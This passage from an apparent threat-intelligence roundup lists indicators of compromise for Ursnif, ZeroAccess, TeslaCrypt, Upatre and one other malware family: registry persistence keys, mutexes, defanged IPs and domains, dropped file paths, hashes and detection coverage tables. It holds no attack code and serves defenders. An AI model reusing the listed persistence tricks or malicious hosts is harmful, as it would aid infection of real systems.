\n`%SystemRoot%\\SysWOW64\\config\\systemprofile:.repos` | 192 \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 188 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 158 \n`%HOMEPATH%` | 59 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 59 \n`%SystemRoot%\\SysWOW64\\wpdjiqwl` | 11 \n`%SystemRoot%\\SysWOW64\\lesyxfla` | 11 \n`%SystemRoot%\\SysWOW64\\mftzygmb` | 10 \n`%SystemRoot%\\SysWOW64\\piwcbjpe` | 10 \n`%SystemRoot%\\SysWOW64\\zsgmltzo` | 10 \n`%SystemRoot%\\SysWOW64\\yrflksyn` | 10 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 9 \n \n#### File Hashes\n\n` 03dfa2a7b5722d6fa2f2f85287c8bea67b2ae1c8be2d9de90b33c2b4dd3c0f42 07314be6c87366f215030d7a2af42440f8a2a187e782ad975a476a84aa389fe1 0862506904a93aba08781be3d9b5189c8cc01bc5fd86d9a4881bd114449502b7 088fe0b34e1db5b9010adb26a2380aa6faf53165f9e2d7d986fd0bc6be614f9e 0ad21f45614d3112c1201ff8a5b3fe702b4943e39ab9d8bc4f38362565c373d5 0b2c1eebcd3f136c556a8568541d589f691dbe6fb450fa708e9774f4ca72fb67 10d2a79f8c199a6ce16b0e3fd4a911524cc2ece755daf67c04f0d3118dfb3498 11e2d71f1dab632b58c9ab60a48c51854d59df47456a97ff9ef59c72b607229c 136e082449131aae0a3e28c21c99aaef24a9d1709cae71daee0e154bf2b45d9f 144d2f639c9dafd40f48b72980609cb018ca83a360b7e24fede6023e0e742397 16f778581e678fdd5e21442d3d55bcc4415271ac94ed0d31c2efd40c772f26ec 1733e36d0e55b369c97e387fa74da22462fbf1858b09befb5de125d9523e3d41 1756a1f4ce0593f80b857ed9a654c656dac96d3405a566dc38737e0a79bc194d 188389b2163b98dbb96edf4000496dacc062f2a6ae2dd021a3f49742d36a2e0b 189f32c3d78e9b129d62bb4e40b3693da216cc371018d5ce4ef2356a94ca4f6e 18f25a4e071f993b9ceac935a3814d7667e42c46d22ea9e8ccd7c4a3f0087f7b 1a747af4f485eb3c8c475c9dcd9cac9d7fe279f3f45777d793572c4927e07ffa 1af4c3359d224c2ad2006db3c9786afdeeb90404ab91ec7c63467092264e2183 1c1d1c939fd6d3e6a77c2fa342f2c39433eea8f9d3c749ecee42e287734bd330 1c69825459d03fb13956e1a0f40e485731fbe96e48efe1abc765db537fec77ba 1d3aecb8b67bd70634fbffcf15b5e21ef0ee95627d296e78caf3f07842820d9a 1d9d2d4000df6baadc93db56dbdc783c9db35a047be86bed8d4bfaacb33b6a9c 1f42ceba5e533e7aeb5395e1db11ef780b02e44c8cde237394b663b816da69b4 1ff0ce00b3cc5e3223e31501e16302b44ae24981b4b61f3500bdba2f671a057f 20f52e7aa1ee2e27dffcb75eb1e207681dbe2f72d44b0f4d2f66498102d8cf8e `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-tmXF5v63Jfs/XhjbhTSqqYI/AAAAAAAADFk/eoXC5VAn8DU9wPiKtOPCvDq23e0ok1oYgCLcBGAsYHQ/s1600/1a747af4f485eb3c8c475c9dcd9cac9d7fe279f3f45777d793572c4927e07ffa_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-SRL2YycZuyI/XhjbmvOX-2I/AAAAAAAADFo/mxJn335IT1QK3kgnuIvNsWNXtiaeupf7gCLcBGAsYHQ/s1600/68e9ffea30a67de2447273c5a42a929c25fd64d9e92b61dc35832e7346abbbac_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-DbOXtwy7wUE/XhjbuUrH5WI/AAAAAAAADFs/EAxRh7Yx__Uj4ZKHmInI8xSA-PBEO-5lwCLcBGAsYHQ/s1600/1a747af4f485eb3c8c475c9dcd9cac9d7fe279f3f45777d793572c4927e07ffa_umbrella.png>)\n\n \n\n\n* * *\n\n### Win.Packed.Ursnif-7489213-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 18 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 18 \nMutexes | Occurrences \n---|--- \n`Local\\https://vars.hotjar.com/` | 18 \n`Local\\https://www.avast.com/` | 18 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`23[.]221[.]50[.]122` | 18 \n`152[.]199[.]4[.]33` | 18 \n`23[.]221[.]49[.]75` | 18 \n`23[.]221[.]50[.]102` | 18 \n`104[.]107[.]26[.]214` | 18 \n`13[.]109[.]156[.]118` | 18 \n`65[.]55[.]44[.]109` | 17 \n`157[.]240[.]18[.]35` | 15 \n`104[.]107[.]18[.]91` | 15 \n`38[.]126[.]130[.]202` | 15 \n`192[.]42[.]119[.]41` | 14 \n`13[.]107[.]21[.]200` | 13 \n`172[.]217[.]164[.]136` | 13 \n`23[.]196[.]81[.]176` | 13 \n`204[.]79[.]197[.]200` | 12 \n`204[.]2[.]197[.]202` | 12 \n`72[.]22[.]185[.]200/31` | 12 \n`172[.]217[.]197[.]156/31` | 12 \n`172[.]217[.]6[.]206` | 11 \n`172[.]217[.]12[.]136` | 11 \n`172[.]217[.]11[.]36` | 11 \n`172[.]217[.]10[.]14` | 11 \n`169[.]54[.]251[.]164` | 11 \n`23[.]201[.]42[.]247` | 11 \n`23[.]201[.]42[.]161` | 11 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`googleads[.]g[.]doubleclick[.]net` | 18 \n`www[.]googletagmanager[.]com` | 18 \n`www[.]google-analytics[.]com` | 18 \n`stats[.]g[.]doubleclick[.]net` | 18 \n`connect[.]facebook[.]net` | 18 \n`www[.]googleadservices[.]com` | 18 \n`ib[.]adnxs[.]com` | 18 \n`avast[.]com` | 18 \n`static[.]avast[.]com` | 18 \n`secure[.]adnxs[.]com` | 18 \n`mc[.]yandex[.]ru` | 18 \n`dev[.]visualwebsiteoptimizer[.]com` | 18 \n`amplifypixel[.]outbrain[.]com` | 18 \n`pixel[.]mathtag[.]com` | 18 \n`tr[.]outbrain[.]com` | 18 \n`amplify[.]outbrain[.]com` | 18 \n`ajax[.]aspnetcdn[.]com` | 18 \n`img-prod-cms-rt-microsoft-com[.]akamaized[.]net` | 18 \n`az725175[.]vo[.]msecnd[.]net` | 18 \n`script[.]hotjar[.]com` | 18 \n`static[.]hotjar[.]com` | 18 \n`c[.]s-microsoft[.]com` | 18 \n`assets[.]onestore[.]ms` | 18 \n`a[.]tribalfusion[.]com` | 18 \n`www[.]avast[.]com` | 18 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\www2.tmp` | 13 \n`%TEMP%\\www3.tmp` | 13 \n`%TEMP%\\www4.tmp` | 13 \n`%HOMEPATH%\\Favorites\\Links\\Suggested Sites.url` | 13 \n`%HOMEPATH%\\Local Settings\\Application Data\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms` | 13 \n`%HOMEPATH%\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms` | 13 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}` | 2 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\Interface\\{B40C43F1-F039-44D2-AEB7-87F5AF8ABC3D}\\ProxyStubClsid32` | 2 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{06EEE834-461C-42c2-8DCF-1502B527B1F9}\\Instance\\PropertySetStorage` | 2 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{D1FE6762-FC48-11D0-883A-3C8B00C10000}` | 2 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{A3CCEDF7-2DE2-11D0-86F4-00A0C913F750}` | 1 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{00020420-0000-0000-C000-000000000046}` | 1 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{A7EE7F34-3BD1-427f-9231-F941E9B7E1FE}` | 1 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{06EEE834-461C-42c2-8DCF-1502B527B1F9}\\Instance\\PropertySetStorage\\{000214A0-0000-0000-C000-000000000046}\\14` | 1 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{06EEE834-461C-42c2-8DCF-1502B527B1F9}\\Instance\\PropertySetStorage\\{000214A0-0000-0000-C000-000000000046}\\2` | 1 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{6f237df9-9ddb-47ad-b218-400d54c286ad}` | 1 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\\InProcServer32` | 1 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{81397204-F51A-4571-8D7B-DC030521AABD}\\InprocServer32` | 1 \n \n#### File Hashes\n\n` 0ad051eb62410a3fe8d776a69f29a46fe609ea59c2adfe061811dc9ace3e40e9 17cfe796a3b8017bf83d2c302ec9507317abac0191cdf835d2d0d1a75d33b991 18b5f4e21612aadfed4e72cdef1356009fb1614535b62a4e39463f8cea9ace03 2013ff55ccdd16e36eccebe50b0587b6f2f37e333442be1552b50c41cbfe48d4 241ab82dccad5b9670c445509841c6aebf69de45815c3d9951f15be158b8ece5 270f970f0cfda8e8c61a73b2aab71fd51755ad911b8173f5aac4cdb5961ba8a5 3016c699d4c8c7affedc18f5cb4aadb30676a9c3081dee913b43b84737949708 31a02187883766f2eec0edc6479b8cd793c8e8eec658fe56b33581a76d9953f8 365acef54f3733520717314466c86aa978cbf08c37d1f9f0a90bbbea42b3f8f3 5ba3ea5868ddef74a57fff2c5ded68f17b08458876881161a7af9eb32438779d 5c486b96a5f273819baa9a010700f088ce3f707c87088a50e699ee6dedd0b117 611e95e1a1a352d6cb1a6106b0e69565b065de6d68dbe5c41d49c2ebfa637dd6 7a8b53746144a903954535791ef7c5038834af3cd1eec8c0dae8b28f609859bf 7fd6f59c5c23ea12adf5975e56730a52558799ae7a330ef40e552a4353a8d6e3 8220634b1969f5a06e3b5adff2dbae0356608a91e5162fccdd247f1571a2a4b2 9a20d2755608e7cf98a090f30b166779318f0a08747631fccc9393de15ed33cc 9b6503731468ce3922f5aec73e22a81489ddcf6124d86eeb2fc05cb7c2f4527f b062f5f376af3972c8386343b27fb1e5947afb66c5c0741cced2d317f5261158 b2c7bc0dece9bed221c3fe88b9dce2313b036b9a3f5982b5bfa91961efb7bdaf bb8d733fa6ca4ef01d8b44d098902e781359cdd36a4418538a504082b3b95fe6 cecc5dd05c51a6740730b775dc4af3d579b498880de7899b272d6225fb96cb44 e6bd801ae1e976ff76409d2b28d00d15f50e5819c3c5bbc54eb4ac9752f87435 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-qqRWN9IMa3c/XhjcKHygokI/AAAAAAAADF8/X0iED0OEbeM0ZcIVlOarHSO4ziPfJuQdACLcBGAsYHQ/s1600/bb8d733fa6ca4ef01d8b44d098902e781359cdd36a4418538a504082b3b95fe6_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.ZeroAccess-7489468-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\TRACING\\KMDDSP \nValue Name: FileTracingMask ` | 55 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\TRACING\\KMDDSP \nValue Name: ConsoleTracingMask ` | 55 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\TRACING\\KMDDSP \nValue Name: MaxFileSize ` | 55 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\TRACING\\KMDDSP \nValue Name: FileDirectory ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: Start ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: DeleteFlag ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: DeleteFlag ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BROWSER \nValue Name: Start ` | 55 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Type ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: ErrorControl ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: Type ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: ErrorControl ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: DeleteFlag ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Type ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: ErrorControl ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Type ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: ErrorControl ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000010 \nValue Name: PackedCatalogItem ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009 \nValue Name: PackedCatalogItem ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008 \nValue Name: PackedCatalogItem ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007 \nValue Name: PackedCatalogItem ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006 \nValue Name: PackedCatalogItem ` | 55 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005 \nValue Name: PackedCatalogItem ` | 55 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`94[.]242[.]250[.]64` | 116 \n`64[.]210[.]151[.]32` | 55 \n`178[.]32[.]190[.]142` | 55 \n`91[.]207[.]60[.]22` | 15 \n`71[.]229[.]165[.]75` | 15 \n`201[.]231[.]100[.]117` | 15 \n`71[.]239[.]117[.]142` | 9 \n`66[.]41[.]70[.]14` | 8 \n`71[.]63[.]0[.]235` | 7 \n`98[.]224[.]77[.]3` | 7 \n`83[.]15[.]111[.]38` | 7 \n`76[.]180[.]80[.]134` | 7 \n`24[.]73[.]24[.]191` | 7 \n`46[.]45[.]5[.]240` | 7 \n`67[.]185[.]179[.]4` | 6 \n`98[.]230[.]137[.]123` | 6 \n`69[.]80[.]173[.]91` | 6 \n`75[.]66[.]129[.]205` | 6 \n`69[.]117[.]29[.]163` | 6 \n`190[.]36[.]183[.]136` | 6 \n`77[.]126[.]70[.]166` | 6 \n`98[.]203[.]164[.]253` | 6 \n`67[.]240[.]46[.]208` | 5 \n`72[.]200[.]101[.]79` | 5 \n`68[.]97[.]172[.]87` | 5 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`promos[.]fling[.]com` | 55 \nFiles and or directories created | Occurrences \n---|--- \n`\\@` | 116 \n`\\L\\eexoxfxs` | 116 \n`\\cfg.ini` | 116 \n`\\systemroot\\assembly\\GAC_32\\Desktop.ini` | 55 \n`\\systemroot\\assembly\\GAC_64\\Desktop.ini` | 55 \n`%System32%\\LogFiles\\Scm\\e22a8667-f75b-4ba9-ba46-067ed4429de8` | 55 \n`%SystemRoot%\\assembly\\GAC_32\\Desktop.ini` | 55 \n`%SystemRoot%\\assembly\\GAC_64\\Desktop.ini` | 55 \n`\\systemroot\\assembly\\temp\\@` | 55 \n`\\systemroot\\assembly\\temp\\U` | 55 \n`\\systemroot\\assembly\\temp\\cfg.ini` | 55 \n`\\systemroot\\system32\\consrv.dll` | 55 \n`%System32%\\consrv.dll` | 55 \n`%SystemRoot%\\assembly\\temp\\@` | 55 \n`%SystemRoot%\\assembly\\temp\\cfg.ini` | 55 \n`\\systemroot\\system64` | 55 \n \n#### File Hashes\n\n` 024be6e3a83461f6084ade9ef26da705de0e7eeceebbd55ca5289a7396dcf280 02a6714aebbfef68f0528f10414a2fd8a8338243e05992d0c28d68383e1dc1a1 05597af5ff2dd97b20b7c57e4c3cd48cae1a4d2c7cd1c4ac920a6f1185a65900 0712314c985a7cc479d0cbcdcf06c886ba2d7fc79d89cf4efc56a137235eb379 0808ec44505b3130a5dde6e81c75f473f44a288d1134fff680394534283fce87 08b18f2eb8b1fb422adfb52d482f9d9bb3f4a24d18f89a186ed2865181f6b551 0b675bae551f40fe43934915324927652e35fa3089dcc911345478fc96338a3c 0d6aea5357e88970db6f5c226a2a888e1c7f1c5f20146087952612c06d064b4e 15d09a26dec6c151966a24bfebd38fb67c8397a06c3bf1702eb4702a871a9e2c 1744dd32bcf9cd45cfec1f4334de1df340129a555e12f73c740e02f7fe7b469c 1ac467786827d37bc69e30617fa2b14fa8903f68f73022e727caa634379490b2 1c9dc1eb7cb0191101faa393854592a440d6df736f07a767138df22c1f809c8d 1d34f5231571a20d3229e850bb786f6148dab477ca4a0169a0af3acf2d2ce71d 243ccb0ec0007367fc4e21dea982be68d6f32e6cdcafbd11e10768cb912a914b 2460096ab6403840c5de8a19dc1706cf2dc416cc9e3ab701275853d66eb7e142 24ec81e3c8a7247c0fa2292906afccc1d47b81412cfaf021dc22be067530e944 2b275de3b1d0f2786c58f17a0d2607a47dade5151046f255eea2f9da20a03c9c 311c8b6b2d2150fff040363e23fdca221be64cae3ad34d9b3dfacd396ed48fc6 330719fd8491c5abc9fd90c7e27310cb72d331222c5caaf4671525d48e4b1026 35ba7b85dd5146c275b74b7b09ef62985ba9db0d1e1f2771b6990d53ed965d52 37240db16c496c45552715904b84ce5cc2c1e01ebbcf519a7e0bee4cc73f08bd 39bf409ea1d861dfed811fa6c0aee2767aff44d96fffb4f3e552db1add1ed7fc 3b3d6c01a983c835152e169e092be6193bce78c22b41cda5e573e5330235aac6 3e6c74185843c930a9b5ea041a5a3eef7d9ae80a31e3a67e0c235b5090e64afb 3fcf02116eab251a35b6a9dba981edb13ba59701f0b52ca1521fd2dbff350477 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Y-3VEjv6iFk/XhjcZ1WO-yI/AAAAAAAADGA/eNkc2XpubMcY21A1yxwCj7qy42STBflugCLcBGAsYHQ/s1600/4226d5fb55c0175d485ccf6d2c935b5712a03f5bde8f3602432187f438d33352_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.TeslaCrypt-7501245-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\XXXSYS ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: addon_v57 ` | 15 \n`<HKCU>\\SOFTWARE\\XXXSYS \nValue Name: ID ` | 15 \n`<HKCU>\\Software\\<random, matching '[A-Z0-9]{14,16}'> ` | 15 \n`<HKCU>\\Software\\<random, matching '[A-Z0-9]{14,16}'> \nValue Name: data ` | 15 \nMutexes | Occurrences \n---|--- \n`z_a_skh495ldfsgjl2935345` | 15 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`23[.]20[.]239[.]12` | 15 \n`64[.]140[.]157[.]157` | 15 \n`157[.]119[.]94[.]202` | 15 \n`104[.]27[.]31[.]89` | 9 \n`104[.]27[.]30[.]89` | 6 \n`3[.]225[.]189[.]10` | 5 \n`3[.]229[.]167[.]115` | 4 \n`54[.]83[.]91[.]42` | 3 \n`34[.]195[.]145[.]145` | 2 \n`3[.]93[.]124[.]54` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`en[.]wikipedia[.]org` | 15 \n`www[.]torproject[.]org` | 15 \n`www[.]hugedomains[.]com` | 15 \n`vostorgspa[.]kz` | 15 \n`p4fhmjnsdfbm4w4fdsc[.]avowvoice[.]com` | 15 \n`bledisloeenergy[.]com[.]au` | 15 \n`polyhedrusgroup[.]com` | 15 \n`todayinbermuda[.]co` | 15 \n`nn54djhfnrnm4dnjnerfsd[.]replylaten[.]at` | 15 \n`www[.]buildenergyefficienthomes[.]com` | 15 \n`mosaudit[.]com` | 15 \n`buildenergyefficienthomes[.]com` | 15 \n`akdfrefdkm45tf33fsdfsdf[.]yamenswash[.]com` | 15 \nFiles and or directories created | Occurrences \n---|--- \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I0ZU5JT.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I478AKJ.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I4FI238.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I4FKVBH.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I4QK3KJ.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I5QX7W9.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I77RW1L.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I7J37KF.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I9NSD58.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IANXEE8.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IC5NB1M.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$ID60W3E.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IIUTK07.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IJE160U.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IKAVPAE.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IL2NS3P.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$INKC8CM.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IP8M1EE.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IPDP9E0.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$ISIYA4I.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IV54ALI.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IWK2JPN.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IWYYKMD.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IXC3P46.txt` | 15 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IZ7KADN.txt` | 15 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 00de6704e49ec7e8b570b95410704c0d3d81c727c688d06afe68e4f8f4e4b8e6 079ab9339f5b1ccf429dbf4426350c311adc6bdeeb3a003970d052088dcdaabf 4b7a8b7ffac89faa52034d12821a9e20bfd987adcdcbdba29d6daaca44ef9325 6352e2794884e3c090f6ec14ec8c870fdc6d4cde61f518c44ed5bae2916e67c8 69a0539a87e7a9fe382cf4c504c3d02bf6ee4cd6a5e20098ed619da8975480ee 70311b0da413a17ed6c5f300adcd7757301346300693823ba4e1e7845901c1b8 7f1a0f921a5132b1329dbdbfadc83eec6568ad151d1c33da89a4aaf0a5e5c0c2 a7ba5bb407c401764b9af3e22b005962431d5446f1c8ba468ab71a7ed1033299 b8dd6020265dc28fa74d1708e2238cc227791dace690699db22cbb3ba6c1d64c bd9a8d8d2c8e1d426959e7022ecd26b7001998aba2617e13deac573d16208916 c7a8125f64e0c8d4133263f901855d1ef0ecea2e083c10782e4cfbbe8b334e79 dca1535c72840c4a47886ee0e23437fc560a4fea29c9c62f63a58726d21a565b e010d87d8cb503b316a2dc3e064b99178b7040a213251ce49e58fd0d23c6cef5 eb6259dd5f1ed9540edc3e0e9944e08145b9514320cd65c26612b32b92fa6885 f347dc8de7cefff44e6127fcfd035c08d31439a6f4951dd92549bdd6400b60aa `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-iSEWTi-rpVg/XhjcrD5aDtI/AAAAAAAADGM/wcV-gUOAeTwYZKk76cr4_1rRZ7g0EpIuACLcBGAsYHQ/s1600/6352e2794884e3c090f6ec14ec8c870fdc6d4cde61f518c44ed5bae2916e67c8_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-xktgUep7xTY/Xhjcvqpc-fI/AAAAAAAADGQ/qLrAcuLsx1U9DPmJztz1Y9lWZr5NOs9BQCLcBGAsYHQ/s1600/6352e2794884e3c090f6ec14ec8c870fdc6d4cde61f518c44ed5bae2916e67c8_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-PY-NqSLRN40/Xhjc0iwNiCI/AAAAAAAADGU/s7jL0uMjsvsHxOCPIJ3ykkkSvyUkGv7BACLcBGAsYHQ/s1600/6352e2794884e3c090f6ec14ec8c870fdc6d4cde61f518c44ed5bae2916e67c8_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Upatre-7491797-0\n\n#### Indicators of Compromise\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`93[.]185[.]4[.]90` | 25 \n`104[.]20[.]17[.]242` | 10 \n`98[.]214[.]11[.]253` | 6 \n`66[.]196[.]61[.]218` | 6 \n`98[.]246[.]210[.]27` | 6 \n`81[.]90[.]175[.]7` | 5 \n`216[.]16[.]93[.]250` | 5 \n`76[.]84[.]81[.]120` | 4 \n`217[.]168[.]210[.]122` | 4 \n`84[.]246[.]161[.]47` | 4 \n`85[.]135[.]104[.]170` | 3 \n`24[.]148[.]217[.]188` | 3 \n`81[.]93[.]205[.]251` | 3 \n`81[.]93[.]205[.]218` | 3 \n`62[.]204[.]250[.]26` | 3 \n`173[.]248[.]31[.]1` | 3 \n`87[.]249[.]142[.]189` | 2 \n`98[.]209[.]75[.]164` | 2 \n`194[.]228[.]203[.]19` | 2 \n`24[.]220[.]92[.]193` | 2 \n`176[.]36[.]251[.]208` | 2 \n`109[.]86[.]226[.]85` | 